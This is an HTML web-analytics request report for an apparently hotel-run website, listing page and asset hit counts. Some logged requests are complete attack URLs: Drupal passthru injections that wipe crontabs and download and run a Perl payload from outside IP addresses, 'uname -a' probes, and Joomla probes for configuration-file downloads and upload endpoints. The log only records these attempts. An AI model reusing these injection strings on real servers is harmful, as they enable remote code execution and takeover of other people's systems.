<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead>
<tbody><tr><td class="R">35897</td><td class="b">63.42%</td><td class="xl">/assets/</td></tr>
<tr><td class="R">31901</td><td class="b">33.68%</td><td class="xl">[root directory]</td></tr>
<tr><td class="R">2119</td><td class="b"> 1.80%</td><td class="xl">/accommodation/</td></tr>
<tr><td class="R">1128</td><td class="b"> 0.92%</td><td class="xl">/facilities/</td></tr>
<tr><td class="R">105</td><td class="b"> 0.15%</td><td class="xl">/contact-us/</td></tr>
<tr><td class="R">29</td><td class="b"> 0.03%</td><td class="xl">/index.php/</td></tr>
</tbody></table>
</div><div class="req"><h2><a name="req" id="req">Request Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p>
<p><img src="./req.png" alt="" /></p>
<p class="whatinc">
Listing files with at least 20 requests, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead>
<tbody><tr><td class="R">18839</td><td class="b">20.07%</td><td class="D">Apr/30/19  5:22 PM</td><td class="xl"><a href="/">/</a></td></tr>
<tr class="sub level2"><td class="R">133</td><td class="b"> 0.14%</td><td class="D">Apr/29/19  9:35 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?id=1">/?id=1</a></td></tr>
<tr class="sub level2"><td class="R">111</td><td class="b"> 0.12%</td><td class="D">Apr/11/19  1:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=file/ajax/name/%23value/">/?q=file/ajax/name/#value/</a></td></tr>
<tr class="sub level2"><td class="R">54</td><td class="b"> 0.06%</td><td class="D">Feb/25/19  5:43 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?172.68.211.147">/?172.68.211.147</a></td></tr>
<tr class="sub level2"><td class="R">42</td><td class="b"> 0.04%</td><td class="D">Feb/28/19  5:52 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?172.68.189.240">/?172.68.189.240</a></td></tr>
<tr class="sub level2"><td class="R">40</td><td class="b"> 0.04%</td><td class="D">Apr/16/19 12:19 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/register">/?q=user/register</a></td></tr>
<tr class="sub level2"><td class="R">31</td><td class="b"> 0.03%</td><td class="D">Apr/16/19 12:19 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=node/add">/?q=node/add</a></td></tr>
<tr class="sub level2"><td class="R">24</td><td class="b"> 0.03%</td><td class="D">Apr/11/19  1:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23markup%5D=crontab%20-r%20;%20killall%20-9%20perl%20;%20cd%20/tmp/%20;%20wget%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20fetch%20http://31.184.195.114/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.114/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20crontab%20-r&amp;name%5B%23type%5D=markup">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#markup]=crontab -r ; killall -9 perl ; cd /tmp/ ; wget http://31.184.195.114/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; fetch http://31.184.195.114/index.log.2018.06.26 ; lwp-download http://31.184.195.114/index.log.2018.06.26 ; curl -O http://31.184.195.114/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; crontab -r&amp;name[#type]=markup</a></td></tr>
<tr class="sub level2"><td class="R">20</td><td class="b"> 0.02%</td><td class="D">Feb/20/19  4:21 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23markup%5D=crontab%20-r%20;%20killall%20-9%20perl%20;%20cd%20/tmp/%20;%20wget%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20fetch%20http://31.184.195.89/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.89/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20crontab%20-r&amp;name%5B%23type%5D=markup">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#markup]=crontab -r ; killall -9 perl ; cd /tmp/ ; wget http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; fetch http://31.184.195.89/index.log.2018.06.26 ; lwp-download http://31.184.195.89/index.log.2018.06.26 ; curl -O http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; crontab -r&amp;name[#type]=markup</a></td></tr>
<tr class="sub level2"><td class="R">17</td><td class="b"> 0.02%</td><td class="D">Jul/14/18  4:26 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23type%5D=markup&amp;name%5B%23markup%5D=uname+-a">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#type]=markup&amp;name[#markup]=uname+-a</a></td></tr>
<tr class="sub level2"><td class="R">17</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=12">/?author=12</a></td></tr>
<tr class="sub level2"><td class="R">17</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=3">/?author=3</a></td></tr>
<tr class="sub level2"><td class="R">16</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=14">/?author=14</a></td></tr>
<tr class="sub level2"><td class="R">16</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=15">/?author=15</a></td></tr>
<tr class="sub level2"><td class="R">16</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=1">/?author=1</a></td></tr>
<tr class="sub level2"><td class="R">16</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=4">/?author=4</a></td></tr>
<tr class="sub level2"><td class="R">16</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=5">/?author=5</a></td></tr>
<tr class="sub level2"><td class="R">16</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=6">/?author=6</a></td></tr>
<tr class="sub level2"><td class="R">16</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=8">/?author=8</a></td></tr>
<tr class="sub level2"><td class="R">16</td><td class="b"> 0.02%</td><td class="D">Dec/ 8/18  1:38 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23markup%5D=%20cd%20/tmp/%20;%20wget%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20fetch%20http://31.184.195.89/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.89/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20crontab%20-r&amp;name%5B%23type%5D=markup">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#markup]= cd /tmp/ ; wget http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; fetch http://31.184.195.89/index.log.2018.06.26 ; lwp-download http://31.184.195.89/index.log.2018.06.26 ; curl -O http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; crontab -r&amp;name[#type]=markup</a></td></tr>
<tr class="sub level2"><td class="R">15</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=10">/?author=10</a></td></tr>
<tr class="sub level2"><td class="R">15</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=11">/?author=11</a></td></tr>
<tr class="sub level2"><td class="R">15</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=13">/?author=13</a></td></tr>
<tr class="sub level2"><td class="R">15</td><td class="b"> 0.02%</td><td class="D">Mar/30/19  5:37 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?134.209.46.23">/?134.209.46.23</a></td></tr>
<tr class="sub level2"><td class="R">15</td><td class="b"> 0.02%</td><td class="D">Jul/ 1/18  5:46 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?172.68.58.84">/?172.68.58.84</a></td></tr>
<tr class="sub level2"><td class="R">15</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=2">/?author=2</a></td></tr>
<tr class="sub level2"><td class="R">15</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=7">/?author=7</a></td></tr>
<tr class="sub level2"><td class="R">15</td><td class="b"> 0.02%</td><td class="D">Apr/27/19  2:39 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=9">/?author=9</a></td></tr>
<tr class="sub level2"><td class="R">10</td><td class="b"> 0.01%</td><td class="D">Apr/29/19  5:40 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?2402:4000:2081:df54:48a0:1b6c:1d51:4bf">/?2402:4000:2081:df54:48a0:1b6c:1d51:4bf</a></td></tr>
<tr class="sub level2"><td class="R">10</td><td class="b"> 0.01%</td><td class="D">Jan/25/19  6:56 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=node/99/delete&amp;destination=node?q%5B%2523%5D%5B%5D=passthru%26q%5B%2523type%5D=markup%26q%5B%2523markup%5D=id;uname+-a">/?q=node/99/delete&amp;destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=id;uname+-a</a></td></tr>
<tr class="sub level2"><td class="R">10</td><td class="b"> 0.01%</td><td class="D">May/18/18  6:29 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23type%5D=markup&amp;name%5B%23markup%5D=wget+https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#type]=markup&amp;name[#markup]=wget+https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php</a></td></tr>
<tr><td class="R">1732</td><td class="b"> 2.36%</td><td class="D">Apr/30/19  6:39 AM</td><td class="xl">/contact-us</td></tr>
<tr><td class="R">1387</td><td class="b"> 1.89%</td><td class="D">Apr/29/19  2:09 PM</td><td class="xl">/contact-us.php</td></tr>
<tr><td class="R">1338</td><td class="b"> 0.59%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/js/misc/drupal.js</td></tr>
<tr class="sub level2"><td class="R">1039</td><td class="b"> 0.45%</td><td class="D">Nov/12/18  3:37 PM</td><td class="xl">&nbsp;&nbsp;/assets/js/misc/drupal.js?nsbnfj</td></tr>
<tr><td class="R">1244</td><td class="b"> 0.31%</td><td class="D">Apr/30/19  5:22 PM</td><td class="xl">/assets/img/logo_main.png</td></tr>
<tr><td class="R">1104</td><td class="b"> 1.37%</td><td class="D">Apr/28/19  9:39 PM</td><td class="xl">/gallery</td></tr>
<tr><td class="R">1049</td><td class="b"> 0.01%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/js/lazyloadxt.bg.min.js</td></tr>
<tr><td class="R">1047</td><td class="b"> 0.34%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/js/modernizr.min.js</td></tr>
<tr><td class="R">1029</td><td class="b"> 0.79%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/js/jquery.nivo.slider.js</td></tr>
<tr><td class="R">1027</td><td class="b"> 0.98%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/js/bootstrap.min.js</td></tr>
<tr><td class="R">1023</td><td class="b"> 0.05%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/js/responsive_navigation_ellens.js</td></tr>
<tr><td class="R">1019</td><td class="b"> 0.37%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/js/scripts.js</td></tr>
<tr><td class="R">1015</td><td class="b"> 2.65%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/js/jquery-1.11.2.min.js</td></tr>
<tr><td class="R">1015</td><td class="b"> 0.65%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/js/owl.carousel.min.js</td></tr>
<tr><td class="R">1014</td><td class="b"> 0.14%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/js/jquery.bootstrap.newsbox.min.js</td></tr>
<tr><td class="R">1013</td><td class="b">12.45%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/js/jquery-ui.js</td></tr>
<tr><td class="R">1009</td><td class="b"> 0.06%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/js/lazyloadxt.min.js</td></tr>
<tr><td class="R">1004</td><td class="b"> 0.21%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/js/cssmin.js</td></tr>
<tr><td class="R">839</td><td class="b"> 2.60%</td><td class="D">Apr/30/19  5:22 PM</td><td class="xl">/assets/css/ellens_main.css</td></tr>
<tr><td class="R">836</td><td class="b"> 0.09%</td><td class="D">Apr/30/19  5:22 PM</td><td class="xl">/assets/css/styles.css</td></tr>
<tr><td class="R">816</td><td class="b"> 0.02%</td><td class="D">Apr/30/19 12:58 PM</td><td class="xl">/assets/css/fonts.css</td></tr>
<tr><td class="R">814</td><td class="b"> 0.04%</td><td class="D">Apr/30/19  5:22 PM</td><td class="xl">/assets/owl-carousel/owl.carousel.css</td></tr>
<tr><td class="R">807</td><td class="b"> 0.09%</td><td class="D">Apr/30/19  5:22 PM</td><td class="xl">/assets/css/accordian.css</td></tr>
<tr><td class="R">795</td><td class="b"> 0.52%</td><td class="D">Apr/30/19  5:22 PM</td><td class="xl">/assets/css/responsive.css</td></tr>
<tr><td class="R">792</td><td class="b"> 0.05%</td><td class="D">Apr/30/19  5:22 PM</td><td class="xl">/assets/owl-carousel/owl.theme.css</td></tr>
<tr><td class="R">762</td><td class="b"> 0.19%</td><td class="D">Apr/30/19  5:22 PM</td><td class="xl">/assets/css/magnific-popup.css</td></tr>
<tr><td class="R">745</td><td class="b"> 0.60%</td><td class="D">Apr/30/19 10:48 AM</td><td class="xl">/about-us</td></tr>
<tr><td class="R">740</td><td class="b"> 0.80%</td><td class="D">Apr/30/19  5:22 PM</td><td class="xl">/assets/css/jquery-ui.css</td></tr>
<tr><td class="R">736</td><td class="b"> 0.80%</td><td class="D">Apr/30/19  1:54 AM</td><td class="xl">/index.php</td></tr>
<tr class="sub level2"><td class="R">81</td><td class="b"> 0.09%</td><td class="D">Apr/30/19  1:54 AM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_jce&amp;task=plugin&amp;plugin=imgmanager&amp;file=imgmanager&amp;method=form</td></tr>
<tr class="sub level2"><td class="R">58</td><td class="b"> 0.06%</td><td class="D">Apr/30/19  1:53 AM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_adsmanager&amp;task=upload&amp;tmpl=component</td></tr>
<tr class="sub level2"><td class="R">54</td><td class="b"> 0.06%</td><td class="D">Apr/30/19  1:53 AM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_jdownloads&amp;Itemid=0&amp;view=upload</td></tr>
<tr class="sub level2"><td class="R">31</td><td class="b"> 0.03%</td><td class="D">Mar/26/19  6:52 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_myblog&amp;task=ajaxupload</td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/30/19  1:54 AM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_joomanager&amp;controller=details&amp;task=download&amp;path=configuration.php</td></tr>
<tr class="sub level2"><td class="R">26</td><td class="b"> 0.03%</td><td class="D">Mar/26/19  6:51 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_cckjseblod&amp;task=download&amp;file=configuration.php</td></tr>
<tr class="sub level2"><td class="R">20</td><td class="b"> 0.02%</td><td class="D">Mar/26/19  6:51 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_fabrik&amp;c=import&amp;view=import&amp;filetype=csv&amp;table=</td></tr>
<tr class="sub level2"><td class="R">15</td><td class="b"> 0.02%</td><td class="D">Apr/24/19  9:31 AM</td><td class="xl">&nbsp;&nbsp;/index.php?m=member&amp;c=index&amp;a=register&amp;siteid=1</td></tr>
<tr class="sub level2"><td class="R">11</td><td class="b"> 0.01%</td><td class="D">Apr/24/19  9:31 AM</td><td class="xl">&nbsp;&nbsp;/index.php?lang=Cn&amp;index=0000</td></tr>
<tr class="sub level2"><td class="R">11</td><td class="b"> 0.01%</td><td class="D">Apr/24/19  9:31 AM</td><td class="xl">&nbsp;&nbsp;/index.php?s=/admin/upload/uploadfile</td></tr>
<tr><td class="R">727</td><td class="b"> 0.57%</td><td class="D">Apr/30/19 10:48 AM</td><td class="xl">/location</td></tr>
<tr><td class="R">684</td><td class="b"> 0.58%</td><td class="D">Apr/30/19 12:27 PM</td><td class="xl">/accommodation/standard-rooms</td></tr>
<tr><td class="R">659</td><td class="b"> 3.04%</td><td class="D">Apr/30/19  5:22 PM</td><td class="xl">/assets/images/trip-advisor-ellens.png</td></tr>
<tr><td class="R">632</td><td class="b"> 0.33%</td><td class="D">Apr/29/19 11:01 PM</td><td class="xl">/assets/img/favicon.ico</td></tr>
<tr><td class="R">615</td><td class="b"> 0.06%</td><td class="D">Apr/30/19  5:22 PM</td><td class="xl">/assets/img/cls.png</td></tr>
<tr><td class="R">614</td><td class="b"> 0.59%</td><td class="D">Apr/29/19 11:35 AM</td><td class="xl">/accommodation</td></tr>
<tr><td class="R">602</td><td class="b"> 0.51%</td><td class="D">Apr/30/19  6:38 AM</td><td class="xl">/accommodation/super-deluxe-rooms</td></tr>
<tr><td class="R">598</td><td class="b"> 0.01%</td><td class="D">Apr/29/19 11:01 PM</td><td class="xl">/assets/img/icon.png</td></tr>
<tr><td class="R">596</td><td class="b"> 0.18%</td><td class="D">Apr/29/19 11:01 PM</td><td class="xl">/assets/img/logo_elp.jpg</td></tr>
<tr><td class="R">592</td><td class="b"> 0.50%</td><td class="D">Apr/28/19  9:39 PM</td><td class="xl">/accommodation/deluxe-rooms</td></tr>
<tr><td class="R">589</td><td class="b"> 3.12%</td><td class="D">Apr/29/19 11:01 PM</td><td class="xl">/assets/images/retreats.jpg</td></tr>
<tr><td class="R">586</td><td class="b"> 0.49%</td><td class="D">Apr/30/19 10:48 AM</td><td class="xl">/promotions</td></tr>
<tr><td class="R">574</td><td class="b"> 0.54%</td><td class="D">Apr/29/19  6:58 PM</td><td class="xl">/suites.php</td></tr>
<tr><td class="R">567</td><td class="b"> 3.28%</td><td class="D">Apr/29/19 11:01 PM</td><td class="xl">/assets/images/getting.jpg</td></tr>
<tr><td class="R">563</td><td class="b"> 1.08%</td><td class="D">Apr/29/19 11:01 PM</td><td class="xl">/assets/images/suites.jpg</td></tr>
<tr><td class="R">559</td><td class="b"> 2.13%</td><td class="D">Apr/29/19 11:01 PM</td><td class="xl">/assets/images/pool.jpg</td></tr>
<tr><td class="R">557</td><td class="b"> 0.52%</td><td class="D">Apr/29/19 11:01 PM</td><td class="xl">/assets/images/generations.jpg</td></tr>
<tr><td class="R">517</td><td class="b"> 0.42%</td><td class="D">Apr/29/19 11:32 AM</td><td class="xl">/facilities/restaurant</td></tr>
<tr><td class="R">487</td><td class="b"> 7.70%</td><td class="D">Apr/29/19 11:01 PM</td><td class="xl">/assets/images/sliders/sl7.jpg</td></tr>
<tr><td class="R">481</td><td class="b"> 3.74%</td><td class="D">Apr/29/19 11:01 PM</td><td class="xl">/assets/images/sliders/sl8.jpg</td></tr>
<tr><td class="R">458</td><td class="b"> 0.04%</td><td class="D">Apr/29/19 11:01 PM</td><td class="xl">/assets/img/rght_arrow.png</td></tr>
<tr><td class="R">454</td><td class="b"> 3.35%</td><td class="D">Apr/29/19 11:01 PM</td><td class="xl">/assets/images/sliders/sl1.jpg</td></tr>
<tr><td class="R">439</td><td class="b"> 0.39%</td><td class="D">Apr/30/19 10:42 AM</td><td class="xl">/swimming-pool.php</td></tr>
<tr><td class="R">428</td><td class="b"> 0.39%</td><td class="D">Apr/29/19  9:43 PM</td><td class="xl">/facilities</td></tr>
<tr><td class="R">427</td><td class="b"> 0.36%</td><td class="D">Apr/29/19  3:51 AM</td><td class="xl">/promotions.php</td></tr>
<tr><td class="R">421</td><td class="b"> 0.34%</td><td class="D">Apr/28/19  9:39 PM</td><td class="xl">/facilities/swimming-pool</td></tr>
<tr><td class="R">369</td><td class="b"> 1.77%</td><td class="D">Apr/25/19  5:15 PM</td><td class="xl">/assets/js/jssor.slider.js</td></tr>
<tr><td class="R">367</td><td class="b"> 0.95%</td><td class="D">Apr/28/19  2:26 PM</td><td class="xl">/assets/js/jssor.js</td></tr>
<tr><td class="R">359</td><td class="b"> 0.22%</td><td class="D">Apr/30/19 10:48 AM</td><td class="xl">/assets/js/jquery.magnific-popup.min.js</td></tr>
<tr><td class="R">352</td><td class="b"> 0.32%</td><td class="D">Apr/30/19  5:22 PM</td><td class="xl">/assets/img/ellens_payment_methods.png</td></tr>
<tr><td class="R">346</td><td class="b"> 0.33%</td><td class="D">Apr/28/19  9:39 PM</td><td class="xl">/privacy-policy</td></tr>
<tr><td class="R">346</td><td class="b"> 0.34%</td><td class="D">Apr/28/19  9:39 PM</td><td class="xl">/terms-and-conditions</td></tr>
<tr><td class="R">332</td><td class="b"> 0.41%</td><td class="D">Apr/30/19  8:57 AM</td><td class="xl">/gallery.php</td></tr>
<tr><td class="R">325</td><td class="b">&nbsp;</td><td class="D">Apr/30/19 10:47 AM</td><td class="xl">/assets/img/list-bullet-common.png</td></tr>
<tr><td class="R">316</td><td class="b"> 0.30%</td><td class="D">Apr/29/19  7:39 AM</td><td class="xl">/accommodation.php</td></tr>
<tr><td class="R">306</td><td class="b"> 0.02%</td><td class="D">Apr/29/19  8:42 AM</td><td class="xl">/assets/img/loading.gif</td></tr>
<tr><td class="R">275</td><td class="b"> 0.25%</td><td class="D">Apr/29/19  2:04 AM</td><td class="xl">/facilities.php</td></tr>
<tr><td class="R">274</td><td class="b"> 0.22%</td><td class="D">Apr/30/19 10:27 AM</td><td class="xl">/about-us.php</td></tr>
<tr><td class="R">254</td><td class="b"> 0.21%</td><td class="D">Apr/29/19 12:10 PM</td><td class="xl">/location.php</td></tr>
<tr><td class="R">252</td><td class="b"> 0.01%</td><td class="D">Apr/29/19  8:42 AM</td><td class="xl">/assets/img/arrows.png</td></tr>
<tr><td class="R">246</td><td class="b"> 0.28%</td><td class="D">Apr/29/19  8:44 AM</td><td class="xl">/assets/images/cont-us.jpg</td></tr>
<tr><td class="R">245</td><td class="b"> 0.22%</td><td class="D">Apr/29/19  5:17 PM</td><td class="xl">/restaurant.php</td></tr>
<tr><td class="R">238</td><td class="b"> 0.03%</td><td class="D">Apr/24/19 11:08 AM</td><td class="xl">/assets/img/a11.png</td></tr>
<tr><td class="R">222</td><td class="b"> 0.21%</td><td class="D">Apr/25/19  2:57 AM</td><td class="xl">/deluxe_rooms.php</td></tr>
<tr><td class="R">219</td><td class="b"> 0.13%</td><td class="D">Apr/29/19  8:44 AM</td><td class="xl">/assets/img/contact-details.png</td></tr>
<tr><td class="R">201</td><td class="b"> 0.11%</td><td class="D">Apr/29/19  8:42 AM</td><td class="xl">/assets/img/cal_rght.png</td></tr>
<tr><td class="R">195</td><td class="b"> 0.19%</td><td class="D">Apr/29/19  1:27 PM</td><td class="xl">/standard_rooms.php</td></tr>
<tr><td class="R">185</td><td class="b"> 0.10%</td><td class="D">Apr/21/19 11:58 AM</td><td class="xl">/assets/img/cal_lft.png</td></tr>
<tr><td class="R">160</td><td class="b"> 0.15%</td><td class="D">Apr/28/19  9:35 PM</td><td class="xl">/privacy-policy.php</td></tr>
<tr><td class="R">146</td><td class="b"> 0.01%</td><td class="D">Apr/29/19 10:39 PM</td><td class="xl">/sitemap.xml</td></tr>
<tr><td class="R">133</td><td class="b"> 0.25%</td><td class="D">Apr/28/19  6:13 AM</td><td class="xl">/assets/images/acc/inner_suites/5.jpg</td></tr>
<tr><td class="R">132</td><td class="b"> 0.13%</td><td class="D">Apr/30/19  5:37 AM</td><td class="xl">/terms-and-conditions.php</td></tr>
<tr><td class="R">127</td><td class="b"> 0.37%</td><td class="D">Apr/28/19  8:17 AM</td><td class="xl">/assets/images/acc/inner_suites/1.jpg</td></tr>
<tr><td class="R">125</td><td class="b"> 0.31%</td><td class="D">Apr/28/19  9:30 PM</td><td class="xl">/assets/images/acc/inner_suites/4.jpg</td></tr>
<tr><td class="R">123</td><td class="b"> 0.28%</td><td class="D">Apr/28/19  1:44 PM</td><td class="xl">/assets/images/acc/inner_suites/2.jpg</td></tr>
<tr><td class="R">123</td><td class="b"> 0.23%</td><td class="D">Apr/28/19  8:52 AM</td><td class="xl">/assets/images/acc/inner_suites/7.jpg</td></tr>
<tr><td class="R">120</td><td class="b"> 0.28%</td><td class="D">Apr/27/19 12:18 AM</td><td class="xl">/assets/images/acc/inner_suites/3.jpg</td></tr>
<tr><td class="R">119</td><td class="b"> 0.24%</td><td class="D">Apr/28/19 10:25 PM</td><td class="xl">/assets/images/acc/inner_suites/6.jpg</td></tr>
<tr><td class="R">117</td><td class="b"> 0.30%</td><td class="D">Apr/28/19  4:19 AM</td><td class="xl">/assets/images/acc/inner_suites/8.jpg</td></tr>
<tr><td class="R">109</td><td class="b"> 0.41%</td><td class="D">Apr/25/19  4:11 PM</td><td class="xl">/assets/images/facilities/pool/pool-3.jpg</td></tr>
<tr><td class="R">105</td><td class="b"> 0.15%</td><td class="D">Apr/23/19 12:24 PM</td><td class="xl"><a href="/contact-us/">/contact-us/</a></td></tr>
<tr><td class="R">104</td><td class="b"> 0.28%</td><td class="D">Apr/27/19 12:18 AM</td><td class="xl">/assets/images/acc/suites_slider3.jpg</td></tr>
<tr><td class="R">103</td><td class="b"> 0.38%</td><td class="D">Apr/27/19 12:18 AM</td><td class="xl">/assets/images/acc/suites_slider1.jpg</td></tr>
<tr><td class="R">103</td><td class="b"> 0.11%</td><td class="D">May/ 1/18  2:45 PM</td><td class="xl">/ipms247.php</td></tr>
<tr><td class="R">102</td><td class="b"> 0.28%</td><td class="D">Apr/27/19 12:18 AM</td><td class="xl">/assets/images/acc/suites_slider2.jpg</td></tr>
<tr><td class="R">102</td><td class="b"> 0.32%</td><td class="D">Apr/27/19 12:18 AM</td><td class="xl">/assets/images/acc/suites_slider4.jpg</td></tr>
<tr><td class="R">86</td><td class="b"> 0.26%</td><td class="D">Apr/28/19 10:12 AM</td><td class="xl">/assets/images/facilities/pool/pool-2.jpg</td></tr>
<tr><td class="R">84</td><td class="b"> 0.07%</td><td class="D">Jul/11/18  7:33 AM</td><td class="xl">/downloads</td></tr>
<tr><td class="R">84</td><td class="b"> 0.31%</td><td class="D">Apr/23/19  6:26 PM</td><td class="xl">/assets/images/facilities/pool/pool-1.jpg</td></tr>
<tr><td class="R">82</td><td class="b"> 0.07%</td><td class="D">Apr/25/19 10:13 AM</td><td class="xl">/last-minute.php</td></tr>
<tr><td class="R">73</td><td class="b"> 0.28%</td><td class="D">Apr/28/19  3:10 AM</td><td class="xl">/assets/images/facilities/pool/pool-4.jpg</td></tr>
<tr><td class="R">73</td><td class="b">&nbsp;</td><td class="D">Apr/25/19  6:42 PM</td><td class="xl">/assets/owl-carousel/grabbing.png</td></tr>
<tr><td class="R">64</td><td class="b"> 0.31%</td><td class="D">Apr/23/19  6:26 PM</td><td class="xl">/assets/images/facilities/pool/pool_slider4.jpg</td></tr>
<tr><td class="R">60</td><td class="b"> 0.24%</td><td class="D">Apr/23/19  6:26 PM</td><td class="xl">/assets/images/facilities/pool/pool_slider3.jpg</td></tr>
<tr><td class="R">59</td><td class="b"> 0.22%</td><td class="D">Apr/23/19  6:26 PM</td><td class="xl">/assets/images/facilities/pool/pool_slider2.jpg</td></tr>
